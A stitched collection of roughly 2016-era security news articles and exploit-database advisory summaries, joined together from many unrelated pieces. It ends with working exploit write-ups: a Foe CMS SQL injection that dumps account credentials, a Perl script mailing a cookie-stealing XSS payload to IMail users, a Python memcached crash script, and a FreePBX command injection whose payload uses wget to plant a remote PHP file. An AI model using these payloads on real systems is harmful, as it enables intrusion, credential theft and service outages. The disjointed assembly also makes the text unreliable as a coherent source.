Popular US food chain Wendy's has been hit by a massive cyber attack, the company has confirmed.
The company reported suspicious activity earlier this year, but the scale of the breach is far bigger than first anticipated.
At least 1,025 of its restaurants were targeted - with debit and credit card information stolen.
The company did not speculate how many people may have been affected, though it did say all of the locations were in the US.
Malware - malicious software - had been installed on point-of-sale systems in the affected locations.
The chain said it was confident the threat had been removed, and was now offering help to customers who may have been affected.
Help includes the offer of one year of "complimentary" fraud protection services.
Suspicious activity
In a statement outlining the details of the attack, Wendy's said the malware could have been operational in its restaurants from as early as Autumn 2015.
Suspicious activity was noticed in February of this year. The company went public with this discovery in May - saying it believed around 300 restaurants had been affected.
But with the number rising to more than 1,000, this hack ranks among one of the most significant in US history.
The Wendy's hack bears some similarity to the attack on Target in 2013. In that breach, around 40 million customers' details were stolen via malware installed on point-of-sale computers.
Wendy's has blamed a third-party for the intrusion, saying a "service provider" that had remote access to the till systems was compromised.
The company did not say who that service provider was, nor did it explain why it had remote access to the tills of 1,025 of the firm's 5,700 restaurants.
The company has set up a page for customers to check if a restaurant they bought food from has been affected.
'Hungry for burgers'
Security researcher Graham Cluley said it is unlikely that many of those affected will be aware they are at risk.
"For most of us it's not a red letter day if we go to somewhere like Wendy's," he said.
"And people won't have registered which one they went to and where they were in the country when it happened."
He also predicted that while the breach may be embarrassing for the firm in the short term, the company would most likely recover quickly.
"I think the average guy on the street has a fairly short memory when it comes to a data breach.
"When you have the choice of walking to Wendy's which is five yards away, or you walk somewhere else 200 yards away. I think you'll just go to Wendy's.
"I'm pretty sure people will just be hungry for burgers again."

SOCIAL NETWORK Facebook, a firm not usually commended for its privacy-aware efforts, has revealed that it's started to test end-to-end encryption on the Messenger service.

We first heard murmurs about Facebook planning to boost its security credentials last month. The Guardian reported that Messenger is to get an encrypted communications mode that will hide messages from the prying eyes of authorities and the social network itself.

Facebook has confirmed the rumours, announcing on Friday that it's letting a handful of paranoid users try out an encrypted 'secret conversations' feature in Messenger.

"That means the messages are intended just for you and the other person, not anyone else, including us," an out-of-character Facebook said in a blog post.

Just as The Guardian reported, the feature is available on an opt-in basis. Facebook noted that the feature will allow messages to be read on only one device, and that the "experience may not be right for everyone".

"Starting a secret conversation with someone is optional. That’s because many people want Messenger to work when you switch between devices, such as a tablet, desktop computer or phone," the firm said.

Facebook pointed out that the secret message mode won't support rich content such as GIFs and videos, or making payments. However, it will come with a Snapchat-style timed messages feature, presumably for more inappropriate messages.

"Within a secret conversation, you can also choose to set a timer to control the length of time each message you send remains visible in the conversation," Facebook said.

It's unlikely that Facebook will roll out end-to-end encryption to all Messenger users, much like WhatsApp, because it would get in the way of some of the service's artificial intelligence features, such as the 'bots' that Zuckerberg revealed earlier this year.

Many companies have made the move to end-to-end encryption following Apple's high-profile tussle with the FBI earlier this year. Facebook-owned WhatsApp now enables encryption by default for all one billion-plus users, and Google has included a secure option in the new Allo Messaging app.

However, whistleblower Edward Snowden has warned users of Allo that Google's decision to offer end-to-end encryption by default only if messages are sent in Incognito mode means it's "dangerous" and "unsafe".

"Google's decision to disable end-to-end encryption by default in its new #Allo chat app is dangerous and makes it unsafe. Avoid it for now," he said on Twitter.

 A total of 105 credit card fraud suspects have been arrested in Asia and Europe following a complex months-long investigation across two continents.

The investigation targeted a gang led from Malaysia whose tentacles spread into 14 European countries (including the UK and Germany) and specialised in using counterfeit credit cards for purchasing of high value goods.

A total of nine arrests took place in Malaysia and 76 across Europe as part of a takedown operation against the group which involved raids against various premises – including two sites where “high quality” counterfeit credit cards were manufactured.

During house searches, 3 000 counterfeit payment cards were also seized, alongside fake passports, cameras, jewellery and substantial amounts of cash.

Cops reckon the crooks used counterfeit credit card to purchase high value goods, mainly at electronic stores and duty-free shops at airports, causing losses estimated at €5m. In Europe, the gang bought mainly jewellery and expensive watches.

The police operation, which ran from the end of 2015 to the spring of 2016, was supported by Europol's European Cybercrime Centre (EC3). Cops credit close police cooperation on a global level as well as the direct support of American Express with achieving a successful conclusion to the complex investigation.

 SECURITY OUTFIT Symantec has warned customers that security flaws in the firm's systems outed by Google's Project Zero last month won't be fixed until mid-July.

Patches were rushed out to cover some of the "as bad as it gets" flaws identified by Project Zero, but patches to secure the fundamental architectural flaws are still some weeks away.

The cloud-based versions of Symantec's Endpoint Protection Small Business Edition will finally be updated this week, but users of the workstation versions will have to wait weeks.

Symantec has promised updates "by mid-July" and recommended that customers apply them as a matter of urgency, but in the meantime Symantec's systems remain vulnerable.

Project Zero publicised the flaws found in Symantec's Norton Antivirus products last week, after uncovering them in May and reporting them to Symantec.

"These vulnerabilities are as bad as it gets. They don't require any user interaction, they affect the default configuration, and the software runs at the highest privilege levels possible," said Project Zero lead Tavis Ormandy in a blog post.

"In certain cases on Windows, vulnerable code is even loaded into the kernel, resulting in remote kernel memory corruption."

Ormandy criticised Symantec for the flaws, which he suggested were the result of cutting corners. For example, antivirus software typically has dedicated unpackers to get around the problem of software 'packers' that compress executables.

"This causes a problem for antivirus products because it changes how executables look," he said.

"Antivirus vendors solve this problem with two solutions. First, they write dedicated unpackers to reverse the operation of the most common packers, and then use emulation to handle less common and custom packers."

The problem with both of these solutions, according to Ormandy, is that they're hugely complicated and prone to vulnerabilities, making it "extremely challenging" to make such code safe.

"We recommend sandboxing and a security development lifecycle, but vendors will often cut corners here. Because of this, unpackers and emulators continue to be a huge source of vulnerabilities," he said.

Other security companies have been whacked for cutting corners here, including Comodo, ESET, FireEye and Kaspersky, but Symantec runs its unpackers in the kernel of the operating system.

 In eight days, Palo Alto is launching a capture the flag competition offering a total of US$16000 (£12340, A$21,245) for the first to complete the six trials.

The first to solve all six challenges will receive US$5000 (£3866, A$6640), and can score six lots of US$1000 (£773, A$1328) if they are also the first to complete each individual track. Each track in the CTF dubbed LabyREnth will test competitor's abilities in disciplines including reverse engineering, programming, and threat intelligence.

The tracks, designed by Palo Alto's @Unit42's Richard Wartell (@wartortell) will become increasingly difficult over time.

Wartell is a seasoned game master, having created the first FLARE-ON CTF in 2014 during his time at Mandiant, a competition undertaken by 7140 participants.

Team director Ryan Olson warns punters should expect challenges over many different mediums and architectures.

It is the first CTF for Unit42 and will end a month after kick off on 14 August.

A pre-game challenge has this week been solved; binary littered the CTF homepage which when decoded referenced a dusty meme of 4Chan fame:

“For reals yall. Has anyone really been far as decided to use XOR even go want to do look more like? You’ve got to even have been kidding me with this PAN. I’ve been further even more decided to use even go need to do look more as anyone can for Rules and even more than Prizes have been the Overviews. Can you really be far from Ordering even as decided half as much to use Digits go wish for that?”

 WHISTLEBLOWING DOCUMENT FOUNTAIN WikiLeaks was knocked offline for two hours as part of a war between two rival hacking groups, according to online reports.

The groups have been identified as the infamous Anonymous, or at least the YourAnonNews part of it, and the nefarious OurMine.

Anonymous is the Hydra that grew along with WikiLeaks as a protest group, while OurMine represents itself as offering a serious security service that specialises in exposing high-profile targets and their weaknesses.

OurMine's successful smashes include attacks on Google's Sundar Pichai and Facebook's Mark Zuckerberg.

Online reports claimed that the two groups have a beef that stretches back to 2015, and that OurMine is reacting to a public doxing by Anonymous following an earlier dispute over WikiLeaks and a DDoS attack.

The rivalry, a lot of which played out on Twitter, is still going on. News site The Next Web said that OurMine took out WikiLeaks in revenge.

BuzzFeed has screenshots of a direct message exchange between OurMine and WikiLeaks in which the target site offered the hacker group some advice on more effective account breaking.

A WikiLeaks Twitter admin suggested that OurMine's attacks on Zuckerberg and Pichai should have gone further. The attacks were "a huge waste" and "there's a lot more that could have been done with those accounts, e.g. sending DMs as Zuckerberg to further access elsewhere. Same with the Google CEO."

OurMine's tweeter agreed that this was a great idea.

The group's website gives the impression of a friendly service that should give companies confidence in their own systems.

"We scan the whole company websites and staffs and give you the weaknesses and how to fix it. We scan your website to find vulnerability and how to fix it," the group claims, adding that a money back guarantee is available.

OurMine is also a dab hand at exposing people. It's a skill it shares with WikiLeaks founder Julian Assange, a man with a lot of time on his hands and who could possibly be running the Twitter account from his Ecuadorian quarters.

 A new piece of nasty malware targeting Mac systems has been discovered in the wild, allowing attackers to hijack users' computers.

Dubbed Backdoor.MAC.Eleanor by security researchers at antivirus vendor Bitdefender, the malware installs a backdoor that allows attackers full access to Mac systems, including users' data and control of their webcam. The malware installs itself under the guise of Easy Doc Converter.app, a fake file converter application available for download from reputable sites for Mac software, Bitdefender warned.

The rogue application installs a component that allows attackers to remotely and anonymously access the infected system's control-and-command center. Another component allows attackers to view, edit, rename, delete, upload, download and archive files. They can also execute commands and scripts.

The malware uses a tool named "wacaw" to capture images and videos from built-in webcams, Birdefender warned.

However, the app is not digitally signed by an Apple-approved certificate, meaning Macs with Apple's Gatekeeper security package enabled will be protected.

 HP Enterprise has popped into its Tardis, and gone back in time to patch OpenSSL bugs dating back to 2014 – including the infamous Logjam bug.

The bugs are in various network products: Intelligent Management Center (iMC), the VCX unified communications products, and the Comware network operating system.

The company's notice cites Common Vulnerability and Exposure (CVE) advisories CVE-2014-8176, CVE-2015-1788, CVE-2015-1789, CVE-2015-1790, CVE-2015-1791, CVE-2015-1792, and CVE-2015-1793.

Most of those are Logjam-related; the last is an alternate chains certificate forgery bug. The 2014 CVE was reported in March of that year, but its association with Logjam didn't emerge until June 2015.

Logjam was described by security researchers in May 2015, and rolling out patches has been a long, slow slog for vendors.

 Silent Circle has quietly euthanized its warrant canary for 'business reasons' leading privacy pundits to freak out over double negatives and double speak.

The much-loved privacy company offers the hardened BlackPhone geared to business folks who want to frustrate the surveillance state and criminals.

Like others, its warrant canary was designed to sing if Silent Circle was served with warrant for user data. A sentence saying that no warrant has been received is removed when a warrant is served which prohibits the company from notifying users.

The company told TechCrunch the removal of the canary was a "business decision".

Silent Circle’s general counsel Matt Neiderman said the company had "not received a warrant for user data” and that the decision was "not related to any warrant for user data which we have not received”.

Those lines did little to still the nerves of privacy folks.

Writes one: "Nice double negative there, Silent Circle. What does that even mean? They have not received any warrants, or they have not responded to a warrant they haven't received? Huh?"

And another: "'Not related to any warrant they have NOT received' - that doesn't rule out warrants they have received."

Similar confusion was triggered when Silent Circle updated its canary in March last year to add the important line that a warrant had not been received.

Either way, few appear to have checked the canary's pulse. Neiderman says it was killed "some time ago", but there is little to show when that occurred. The Archive.org records mark it as active on 4 March.

The Electronic Frontier Foundation shuttered its dedicated warrant canary site Canary Watch in May citing the size, diversity, and legal problems of warrant canaries.

The latter relates in part to whether a canary would be considered a breach of warrant disclosure, something which remains untested.

 ANDROID 7.0 NOUGAT will have added security to prevent malware, especially ransomware, resetting passwords and locking owners out of their device.

The long overdue security measure comes after the Android platform was invaded by a wave of ransomware, particularly Android.Lockdroid.E and its variants, in late 2015.

Dinesh Venkatesan, a principal threat analysis engineer at Symantec, said in a Security Response blog post: "These variants scare victims with a system error GUI and then reset the lockscreen password used to access the device.

"Even users who manage to remove the malware without resetting the device may be unable to use the phone because they won't be able to get around the password the malware sets."

Related: 6 of the biggest ransomware threats of 2016

The malware can reset a PIN or pattern-style password in Android by invoking the resetPassword API.

"In order to invoke this method, the calling application must be a device administrator," explained Venkatesan.

"The upcoming Android version ... will introduce a condition so that the invocation of the resetPassword API can only be used to set the password and not to reset the password."

This ensures that malware cannot reset the lockscreen password, as the change is strictly enforced and there is no backward compatibility escape route for the threat.

"Backward compatibility would have allowed malware to reset the lockscreen password even on newer Android versions. With this change, there is no way for the malware to reset the lockscreen password on Android Nougat," Venkatesan said.

However, the measure won't protect people who have not set a password, and who therefore deserve everything they get.

Venkatesan concluded: "The new feature will also affect standalone disinfection utilities, which also depend on the resetPassword() API. A disinfector utility is an automated tool designed to help users whose devices are infected with malware.

"The disinfector should clean the malware [and] reset the arbitrary password set by the threat during its infection routine.

"Before Android Nougat, the disinfector calls the resetPassword() API to achieve this functionality. However, with Android Nougat's new restrictions, the disinfector's ability to call that API is bound to fail." µ

 The advent of a new week brings with it an inventive new scam attack. Online scammers have been found to be preying on the fears of British people in the wake of the EU Referendum to get them to download malicious software onto their devices, according to security researchers.The latest phishing attack exploits Britons' fears about the economy and political turmoil in the wake of the controversial vote.

It comes in the form of an email with a subject line about political uncertainty or economic turmoil, such as "Brexit causes historic market drop". When unsuspecting users open the such malicious emails it downloads software onto their computers or devices.

Such software is known for spying on users, and stealing personal and financial information.

 A GROUP OF Chinese hackers has created a malware campaign that affects 10 million Android devices and pulls in a quarterly criminal haul of $1m.

Security company Check Point has had its eye on the Yingmob gang for five months, describing it as sophisticated, well-staffed, rolling in cash, and a bit of a shit.

The tool of the trade is a piece of malware called HummingBad, and the group works alongside an official advertising analytics company, according to Check Point's From HummingBad to Worse report (PDF).

"HummingBad is a malware Check Point discovered in February 2016 that establishes a persistent rootkit on Android devices, generates fraudulent ad revenue, and installs additional fraudulent apps," Check Point explained in a blog post.

"Yingmob runs alongside a legitimate Chinese advertising analytics company, sharing its resources and technology. The group is highly organised with 25 employees that staff four separate groups responsible for developing HummingBad's malicious components."

The bounderware has parts that look and stink like the YiSpecter problem that went after Apple users and the iOS landscape and mostly affected people in China.

Check Point said that this is no coincidence and that the source is the same, suggesting that the gang is happy to pee on its own doorstep.

"Yingmob uses HummingBad to generate $300,000 a month in fraudulent ad revenue. This steady stream of cash, coupled with a focused organisational structure, proves that cyber criminals can easily become financially self-sufficient," added the firm.

"Emboldened by this independence, Yingmob and groups like it can focus on honing their skills. For example, groups can pool device resources to create powerful botnets, they can create databases of devices to conduct highly targeted attacks, or they can build new streams of revenue by selling access to devices under their control to the highest bidder."

According to the security firm, Over 1.6 million devices in China are infected, 1.35 million in India, 285,000 in the USA, over 200,000 in Russia, and around 45,000 in the UK.

While it affects 10 million active devices, Check Point notes that a whopping 85 million devices have been infected by HummingBad during the months it has been running.

 Just like the internet generally, not all of the Tor network is safe. Sometimes, people set up malicious exit nodes—the part of the network where a user's traffic joins the rest of the normal web—in order to spy on what users are up to.

But there are other types of nosy nodes too. Researchers have uncovered over 100 malicious hidden service directories (HSDirs): the relays of the network that allow people to visit dark web sites.

Typically, a Tor user reaches out to these HSDirs, which store descriptors for various hidden services, in order to visit whatever dark web site they’re after. At the time of writing, there are over 3,000 nodes with the HSDir flag, according to figures from the Tor Project, the non-profit that maintains the Tor software.

When set up properly, these directories don't record or log the addresses of the services themselves, allowing the dark web sites to, hopefully, remain undiscovered. But sometimes people deliberately modify their HSDir to keep a record of all the sites it spots.

 The US industrial control system computer emergency response team (ICS-CERT) has warned of twin flaws in substation control software.

The SICAM Power Automation System contains poorly protected credentials (CVE-2016-5848) and information exposure (CVE-2016-5849) found by Russian researchers Ilya Karpov and Dmitry Sklyarov of Positive Technologies.

The CERT warns lowly hackers could exploit the holes but only with pre-existing local access, greatly limiting the exposure.

"An authenticated local user utilising these vulnerabilities could obtain sensitive information under certain conditions," the CERT warns.

"Impact to individual organisations depends on many factors that are unique to each organisation."

"Siemens has released an update for [CVE-2016-5848] and is working on an update for [CVE-2016-5849]," it says.

"In the meantime, Siemens provides detailed instructions on how to mitigate CVE-2016-5849 for existing installations via the Siemens Energy Customer Support Center."

The company says its SICAM product is used by many in the energy sector and will require updating with admins needing to email the company for patching advice. ®

 The Samsung m2m1shot driver framework is used to provide hardware acceleration for certain media functions, such as JPEG decoding and scaling images. The driver endpoint (/dev/m2m1shot_jpeg) is accessible by the media server. The Samsung S6 Edge is a 64-bit device, so a compatibility layer is used to allow 32-bit processes to provide structures that are expected by the 64-bit driver. There is a stack buffer overflow in the compat ioctl for m2m1shot.

 The Samsung Graphics 2D driver (/dev/fimg2d) is accessible by unprivileged users/applications. It was found that the ioctl implementation for this driver contains a locking error which can lead to memory errors (such as use-after-free) due to a race condition.

 The Exynos Seiren Audio driver has a device endpoint (/dev/seiren) that is accessible by either the system user or the audio group (such as the mediaserver). It was found that the write() implementation for this driver contains a buffer overflow vulnerability that overflows a static global buffer.

 The SecEmailComposer/EmailComposer application used by the Samsung S6 Edge has an exported service action to do quick replies to emails. It was found that this action required no permissions to call, and could lead to an unprivileged application gaining access to email content.

 A path traversal vulnerability was found in the WifiHs20UtilityService. This service is running on a Samsung S6 Edge device, and may be present on other Samsung device models. WifiHs20UtilityService reads any files placed in /sdcard/Download/cred.zip, and unzips this file into /data/bundle. Directory traversal in the path of the zipped contents allows an attacker to write a controlled file to an arbitrary path as the system user.

 Red Hat Security Advisory 2015-1945-01 - Kubernetes allows orchestration and control of Docker containers as used in OpenShift Enterprise 3. Kubernetes fails to validate object name types before passing the data to etcd. As the etcd service generates keys based on the object name type this can lead to a directory path traversal.

 Ubuntu Security Notice 2783-1 - Aleksis Kauppinen discovered that NTP incorrectly handled certain remote config packets. In a non-default configuration, a remote authenticated attacker could possibly use this issue to cause NTP to crash, resulting in a denial of service. Miroslav Lichvar discovered that NTP incorrectly handled logconfig directives. In a non-default configuration, a remote authenticated attacker could possibly use this issue to cause NTP to crash, resulting in a denial of service. Various other issues were also addressed.

 RootedCON 2016 Call For Papers - RootedCON is a security congress that will take place between March 3rd to the 5th, 2016 in Madrid (Spain).

 Oracle E-Business Suite suffers from a cross site scripting vulnerability. Version 12.1.4 is affected.

 Oracle E-Business Suite suffers from a remote SQL injection vulnerability. Versions 12.1.3 and 12.1.4 are affected.

 There is a script in EBS that is used to connect to the database and displays the connection status. Different connection results can help an attacker to find existing database accounts. Version 12.2.4 is affected.

 Ubuntu Security Notice 2782-1 - Gabriel Campana discovered that Apport incorrectly handled Python module imports. A local attacker could use this issue to elevate privileges.

 Red Hat Security Advisory 2015-1943-01 - KVM is a full virtualization solution for Linux on AMD64 and Intel 64 systems. The qemu-kvm package provides the user-space component for running virtual machines using KVM. It was found that the QEMU's websocket frame decoder processed incoming frames without limiting resources used to process the header and the payload. An attacker able to access a guest's VNC console could use this flaw to trigger a denial of service on the host by exhausting all available memory and CPU. This issue was discovered by Daniel P. Berrange of Red Hat.

 Red Hat Security Advisory 2015-1931-01 - KVM is a full virtualization solution for Linux on AMD64 and Intel 64 systems. The qemu-kvm-rhev package provides the user-space component for running virtual machines using KVM. It was found that the QEMU's websocket frame decoder processed incoming frames without limiting resources used to process the header and the payload. An attacker able to access a guest's VNC console could use this flaw to trigger a denial of service on the host by exhausting all available memory and CPU. This issue was discovered by Daniel P. Berrange of Red Hat.

 Joomla remote SQL injection mass exploitation tool that affects versions 3.2 through 3.44.

 Social Microblogging PRO version 1.5 suffers from a stored cross site scripting vulnerability.

 This Metasploit module exploits CVE-2014-9390, which affects Git (versions less than 1.8.5.6, 1.9.5, 2.0.5, 2.1.4 and 2.2.1) and Mercurial (versions less than 3.2.3) and describes three vulnerabilities.

 On Windows 8.1 update the system call NtApphelpCacheControl (the code is actually in ahcache.sys) allows application compatibility data to be cached for quick reuse when new processes are created. A normal user can query the cache but cannot add new cached entries as the operation is restricted to administrators. This is checked in the function AhcVerifyAdminContext. This function has a vulnerability where it doesn't correctly check the impersonation token of the caller to determine if the user is an administrator. This is the proof of concept code.

 Debian Linux Security Advisory 3117-1 - Several vulnerabilities were found in PHP, a general-purpose scripting language commonly used for web application development.

 Cookie Manager is a cookie stealer for XSS to find and mint cookies using PHP.

 Digital Whisper Electronic Magazine issue 57. Written in Hebrew.

 Symantec Web Gateway versions 5.2.1 and below suffer from a remote OS command injection vulnerability.

 GetSimple CMS versions 3.1.1 through 3.3.4 suffer from an XML external entity injection vulnerability.

 CMS Absolute Engine version 1.73 suffers from cross site scripting and remote SQL injection vulnerabilities.

 This Metasploit module exploits a stack-based buffer overflow vulnerability in i-Ftp version 2.20, caused by a long time value set for scheduled download. By persuading the victim to place a specially-crafted Schedule.xml file in the i-FTP folder, a remote attacker could execute arbitrary code on the system or cause the application to crash. This Metasploit module has been tested successfully on Windows XP SP3.

 Debian Linux Security Advisory 3116-1 - It was discovered that a memory leak in parsing X.509 certificates may result in denial of service.

 Mantis Bug Tracker versions 1.2.0 through 1.2.17 suffer from a PHP code injection vulnerability.

 Ubuntu Security Notice 1920-1 - Kees Cook discovered a format string vulnerability in the Broadcom B43 wireless driver for the Linux kernel. A local user could exploit this flaw to gain administrative privileges.

 Red Hat Security Advisory 2013-1121-01 - The sos package contains a set of tools that gather information from system hardware, logs and configuration files. The information can then be used for diagnostic purposes and debugging. The sosreport utility collected the Kickstart configuration file, but did not remove the root user's password from it before adding the file to the resulting archive of debugging information. An attacker able to access the archive could possibly use this flaw to obtain the root user's password. "/root/anaconda-ks.cfg" usually only contains a hash of the password, not the plain text password.

 Mandriva Linux Security Advisory 2013-203 - Multiple vulnerabilities have been discovered and corrected in phpmyadmin. Inclusive are cross site scripting, path disclosure, and SQL injection issues.

 Core Security Technologies Advisory - TP-Link TL-SC3171 IP Cameras suffer from OS command injection, use of hard-coded credentials, authentication bypass, and missing authentication vulnerabilities.

 The Better Security Wordpress Plugin suffers from a stored cross site scripting vulnerability, which can be exploited by a remote unauthenticated attacker to steal cookies or gain privileged access to the affected site. Bit51 Better WP Security Plugin versions 3.4.8, 3.4.9, 3.4.10, 3.5.2, and 3.5.3 are affected.

 Matterdaddy Market version 1.4.2 and below suffers from cross site request forgery and arbitrary file upload vulnerabilities.

 Show In Browser 0.0.3 is a Ruby Gem that suffers from a file injection vulnerability, allowing arbitrary text to be opened in a browser.

 AVE.CMS versions less than 2.09 suffer from a remote blind SQL injection vulnerability in the "module" parameter. This is a proof of concept exploit. This issue is addressed in later versions.

 This is an SQL Injection proof of concept that will display information about the vBulletin software and the admin details from the database. It can be adjusted to read any part of the database.

 Apple Security Advisory 2013-05-22-1 - QuickTime 7.7.4 is now available and addresses multiple issues including buffer overflows and arbitrary code execution vulnerabilities.

 Core Security Technologies Advisory - Vivotek IP Cameras suffer from information leak, buffer overflow, authentication, path traversal, and command injection vulnerabilities. Vulnerable are Vivotek PT7135 IP camera with firmware 0300a, Vivotek PT7135 IP camera with firmware 0400a, and possibly others.

 HP Security Bulletin HPSBPI02869 SSRT100936 - A potential security vulnerability has been identified with HP LaserJet MFP printers, HP Color LaserJet MFP printers, and certain HP LaserJet printers. The vulnerability could be exploited remotely to gain unauthorized access to files. Revision 1 of this advisory.

 Foe CMS version 1.6.5 suffers from cross site scripting and remote SQL injection vulnerabilities.

Title: Foe CMS 1.6.5 SQL Injection Vulnerability
Vendor: http://foecms.com/
Download: http://code.google.com/p/foecms/downloads/list
Versions: 1.6.5
Platform: linux, windows
Bug: SQL Injection | Cross Site Scripting
-------------------------------------------------------

1) Introduction
2) Bug
3) Proof of concept
4) Credits

===========
1) Introduction
===========

Gestor de categorias (Como phpbb3)
Pasar a php orientado a objetos
account_meta para firma, ocupacion, avatar, etc (como wordpress) permite añadir y quitar campos a gusto
Permisos segun rangos para TODO
Pagina del UCP para cambiar los permisos de acceso (amigos y eso)

======
2) Bug
======

SQL Injection
http://victim/[path]/item.php?ei=[SQLi]

Cross Site Scripting
http://victim/[path]/item.php?ei=[XSS]

=====
3)proof of concept
=====

Example SQLi
http://victim/[path]/item.php?ei=-1 union select 1,username,pass_sha,1,1,1,1,1,1 from foe_account--

Example XSS
http://victim/[path]/item.php?ei=<script>alert(1)</script>

 #!/usr/bin/perl
# Exploit Title: Ipswitch IMail 11.01 XSS Vulnerability
# Date: 26-04-2013
# Author: DaOne aka Mocking Bird
# Vendor Homepage: http://www.ipswitch.com/
# Platform: windows

use Net::SMTP;

# ARGV Check
if ($#ARGV != 2)
{
print "\nUSAGE: IMail.pl <Mail Server> <Attacker Email> <VicTim Email>\n";
exit;
}

$host = $ARGV[0];
$attacker = $ARGV[1];
$victim = $ARGV[2];

# Config SMTP
$smtp = Net::SMTP->new( Host => $host,
Hello => 'Hello world',
Timeout => 30)
or die "Couldn't connect to Mail Server\n";

# Attacker and Victim email
$smtp->mail($attacker);
$smtp->to($victim);

# Send email
$buffer = "From: XSS\n".
"To: testing\n".
"Subject: testing\n".
"MIME-Version: 1.0\n".
"Content-Type: multipart/mixed;\n".
" boundary=\"--=45145578442838848853975045745715171602582966277178406402638054315034128543847104614337851625097187549984363453814450535441019\"\n\n".
"----=45145578442838848853975045745715171602582966277178406402638054315034128543847104614337851625097187549984363453814450535441019\n".
"Content-Type: text/html;\n".
"charset=\"utf-8\"\n".
"Content-Transfer-Encoding: quoted-printable\n\n".
"XSS\n".
"<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0 Transitional//EN\">\n".
"<HTML><BODY>\n".
"<script >alert(document.cookie)</script >\n".
"</BODY></HTML>\n\n".
"----=45145578442838848853975045745715171602582966277178406402638054315034128543847104614337851625097187549984363453814450535441019--";

$smtp->data();
$smtp->datasend($buffer);
$smtp->quit();

 Memcached denial of service exploit for an issue disclosed on their bugtracker two years ago and was never patched.

#!/usr/bin/python
# Author: infodox // @info_dox
# Site: insecurety.net
# Old bug, still unpatched. Patch nao?
import sys
import socket

print "Memcached Remote DoS - Bursting Clouds yo!"
if len(sys.argv) != 3:
print "Usage: %s <host> <port>" %(sys.argv[0])
sys.exit(1)

target = sys.argv[1]
port = sys.argv[2]

print "[+] Target Host: %s" %(target)
print "[+] Target Port: %s" %(port)

kill = """\x80\x12\x00\x01\x08\x00\x00\x00\xff\xff\xff"""
kill +="""\xe8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"""
kill +="""\x00\xff\xff\xff\xff\x01\x00\x00\0xabad1dea"""

hax = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
try:
hax.connect((target, int(port)))
print "[+] Connected, firing payload!"
except:
print "[-] Connection Failed... Is there even a target?"
sys.exit(1)
try:
hax.send(kill)
print "[+] Payload Sent!"
except:
print "[-] Payload Sending Failure... WTF?"
sys.exit(1)
hax.close()
print "[*] Should be dead..."

 Mandriva Linux Security Advisory 2013-156 - ModSecurity before 2.7.3 allows remote attackers to read arbitrary files, send HTTP requests to intranet servers, or cause a denial of service via an XML external entity declaration in conjunction with an entity reference, aka an XML External Entity vulnerability. The updated packages have been patched to correct this issue.

 Joomla! versions 3.0.3 and below suffer from a PHP object injection vulnerability in remember.php.

 # Title: FreePBX 2.9 Backup Module Remote Command Execution Vulnerability
# Author: Ahmed Aboul-Ela
# Contact: Ahmed.Aboul3la[at]gmail[dot]com
# Vendor: http://www.freepbx.org
# Software Link: http://mirror.freepbx.org/freepbx-2.9.0.tar.gz
# Version: 2.9 and prior versions should be affected too
# Tested on: Linux (Centos)

- Introduction:

FreePBX is an (graphical user interface) that controls and manages Asterisk, the world's most popular open source telephony engine software.
FreePBX has been developed and hardened by thousands of volunteers over tens of thousands man hours.
FreePBX has been downloaded over 5,000,000 times and estimates over 500,000 active phone systems.

- Vulnerability Explanation:

The vulnerability affects the "page.backup.php" file in the Backup Module of the FreePBX 2.9 which lead to a remote command execution
The affected $dir parameter is already sanitized and protected in the code but it suffers from a weakness that can be used to bypass this sanitization

The following if condition code is used to protect and sanitize the $dir variable in page.backup.php:

if (strstr($dir, '..') || strpos($dir, '\'') || strpos($dir, '"') || strpos($dir, '\'') || strpos($dir,'\`') ||
strstr($file, '..') || strpos($file, '\'') || strpos($file, '"') || strpos($file, '\'') || strpos($file,'\`') ||
strpos($id, '.') || strpos($id, '\'') || strpos($id, '"') || strpos($id, '\'') || strpos($id,'\`') ||
strpos($filetype, '.') || strpos($filetype, '\'') || strpos($filetype, '"') || strpos($filetype, '\'') || strpos($filetype,'\`')) {
print "You're trying to use an invalid character. Please don't.\n";
exit;
}

it should prevent the $dir variable from containing any single or double quotes by checking the presence of it using the strpos() function
but unfortunately there is a weakness in using strpos() that could be used to bypass the sanitization

According to php.net strpos() manual the function should return an integer number which represent the position of the character in the string and it starts the count from 0
so the first position of a character in a string will be 0 and this is the trick which will be used to bypass the sanitization function

if the single quote is the first character in the $dir variable then the strpos function will return 0 number
And if() statement doesn't check for the return type it only check for value so it will consider 0 returned from strpos() as a boolean value not an integer
the 0 for boolean means FALSE so the if condition will be False and it won't detect the single quote at the variable so it will bypass it :)


- Vulnerable Code Snippet at /admin/modules/backup/page.backup.php

LINE 25: $action = isset($_REQUEST['action'])?$_REQUEST['action']:'';
LINE 29: $dir=isset($_REQUEST['dir'])?$_REQUEST['dir']:'';
LINE 35: // The Sanitization code as mentioned
LINE 44: switch ($action) {
LINE 64: case "deletedataset":
LINE 65: exec("/bin/rm -rf '$dir'");

- Proof of Concept:

> To Execute command: wget http://site.com/file.txt -O file.php

http://[ip]/freepbx/admin/modules/backup/page.backup.php?action=deletedataset&dir=';wget http://site.com/file.txt -O file.php; echo 'mission done

> The the evaluated command will be:

/bin/rm -rf '';wget http://site.com/file.txt -O file.php; echo 'mission done'

- Fix / Solution:

you should upgrade to version 2.10

rsync could be made to crash or run programs as your login if it connected to a malicious server.

It was discovered that rsync incorrectly handled memory when certain recursion, deletion and ownership options were used. If a user were tricked into connecting to a malicious server, a remote attacker could cause a denial of service or execute arbitrary code with privileges of the user invoking the program.

A security issue affects these releases of Ubuntu and its derivatives:

• Ubuntu 10.10
• Ubuntu 10.04 LTS
• Ubuntu 9.10

 The problem can be corrected by updating your system to the following package versions:

• Ubuntu 10.10: rsync 3.0.7-2ubuntu1.1
• Ubuntu 10.04 LTS: rsync 3.0.7-1ubuntu1.1
• Ubuntu 9.10: rsync 3.0.6-1ubuntu1.1

In general, a standard system update will make all the necessary changes.

The Node Reference URL Widget module adds a new widget to the Node Reference field type, allowing node reference fields to be auto-populated based on a value from the URL.

The module does not sanitize some of the user-supplied data before displaying it, leading to a Cross Site Scripting (XSS) vulnerability that may lead to a malicious user gaining full administrative access.

Versions affected

• Node Reference URL Widget module for Drupal 6 prior to 6.x-1.10.
• Node Reference URL Widget module for Drupal 7 prior to 7.x-1.10.

Drupal core is not affected. If you do not use the contributed Node Reference URL Widget module, there is nothing you need to do.

Install the latest version:

• If you use the Node Reference URL Widget module for Drupal 6.x upgrade to Node Reference URL Widget 6.x-1.10.
